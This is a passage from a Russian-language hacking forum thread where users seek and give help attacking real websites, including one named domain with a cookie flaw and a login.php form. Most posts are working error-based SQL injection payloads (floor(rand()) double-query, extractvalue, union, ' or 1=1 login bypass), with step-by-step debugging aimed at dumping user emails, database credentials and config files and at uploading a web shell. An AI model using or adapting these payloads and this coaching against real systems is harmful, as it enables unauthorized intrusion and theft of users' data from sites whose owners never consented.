Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Нашёл на этом сайте _http://agixo.ru/ уязвимость в куках прохожу по ссылке http://agixo.ru/1-reg.html реферер админ смотрим куки referer 1
    запускаем оперу меняем 1 на к перехожу по ссылке уже такой http://agixo.ru/reg.html
    смотрим Ник, ID, Предустановленый реф-бек: % все исчезла.
    Что можно сделать с этой уязвимостью можно ли провести sql инвекцию я с уязвимостями в куках ещё не сталкивался
     
  2. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Вобщем делаю sql запрос:
    site.ru/?file=2+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,s_Users.Id,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1

    На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.


    Делаем еще один запрос:
    site.ru/?file=2+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,s_Users.Email,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1

    На что мне выдает: Subquery returns more than 1 row - чертов лимин(((

    Подскажите, как выполнить второй запрос - чтобы избежать лимита.
     
  3. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    У тебя лишнее
    Code:
    +from+`information_schema`.tables+limit+0,1
    Возьми шаблон, и переделай под свой запрос

    Code:
    (select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
    ?file=2+and(select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=1
    p.s. результат подзапроса должен быть - одна строка.
     
    #22523 Ravenous, 2 Oct 2013
    Last edited: 2 Oct 2013
  4. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    В общем есть сайт, на нем login.php
    При пост запросе:

    Head
    Host: сайт.нет
    Content-Type: application/x-www-form-urlencoded

    post
    login=1&password=%5c

    Выдает следующее

    [​IMG]

    Раскрутить скулю не поможете?
    Не знаю что дальше делать)
     
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если кавычки фильтруются и в имени то-же самое, то тогда так:
    Code:
    Имя пользователя: [COLOR=Red]\[/COLOR]
    Пароль: [COLOR=Red]union select .... -- 1[/COLOR]
    
     
  6. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    При таком запросе ничего не происходит(
    login=\&password=union select .... -- 1


    /а во!
    вставил в поля

    [​IMG]

    и что дальше?(
     
    #22526 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  7. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Почитать фак. Но если уж ооочень не хочется, то вместо точек, тебе надо было подставить свой запрос, а точнее начать выяснять количество колонок в таблице.
     
  8. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    login=admin' -- t&password=1
    Попробуйте.
     
  9. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Нет, так не хочет.. походу сама дыра в обработке пароля, а не в логине

    Например? :confused:
     
    #22529 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  10. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Нет, это потому что на конце логина дописался слеш ,я его не заметил, такого пользователя естественно нет в базе. Хотя ещё не совсем понятно, как там с ковычками обстоят дела
    login=admin&password=' or 1=1 -- t
    Вполне может сработать.
     
  11. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    такой игнорит(
    а просто на проверку символов
    '. %5c' не игнорит..
    всё с %5c походу ошибку кидает
     
    #22531 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  12. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Если на \, реагирует то весь участков, вплоть до пароля можно выставить как логин.
    login=admin\&password= or extractvalue(1,concat(0x3b, user())) -- t
     
  13. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    уже ближе..
    что то еще нужно(

    [​IMG]
     
  14. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Если и прокатит, то можно с юнионом поиграться, если нет -
    login=admin\&password= or(select 11 from information_schema.tables group by concat(user(),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t
     
  15. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    [​IMG]

    Другая ошибка, но что то не хочет тоже
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Так вот ты через ошибку вывел нужный тебе результат то: [email protected]
     
  17. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Зачем мне логин и айпи с локалхоста)
    Нужно либо получить название/пароли из бд
    либо конфиг с php файла на самом сайте
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    За тем,что все у вас на виду!
    Пробуйте:
     
  19. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    [​IMG]

    неа(

    ах да либо запрос на загрузку шелла тоже вариант)
     
    #22539 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  20. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Потому что ты неправильно используешь error base sqlinj
    http://clip.corp.mail.ru/clip/m517/1380812270-clip-20kb-fvNTIqJO3gz2.png
    Вот ты использовал и выбрал user(), под которым скрипт получает доступ в базу, тебе он и отобразился. Причём юзер рутовый. Вместо user() и подставляй свои операции по выборке из базы.
    Не вариант, потому что чтобы прогрузить шелл - надо чтобы кавычки не фильтровались. Ты хотя бы читай и анализируй что ты делаешь. В примере, что тебе дали у тебя стоит после select +, который не преобразовался в пробел, замени его.
     
    #22540 Melfis, 3 Oct 2013
    Last edited: 3 Oct 2013
    1 person likes this.
Thread Status:
Not open for further replies.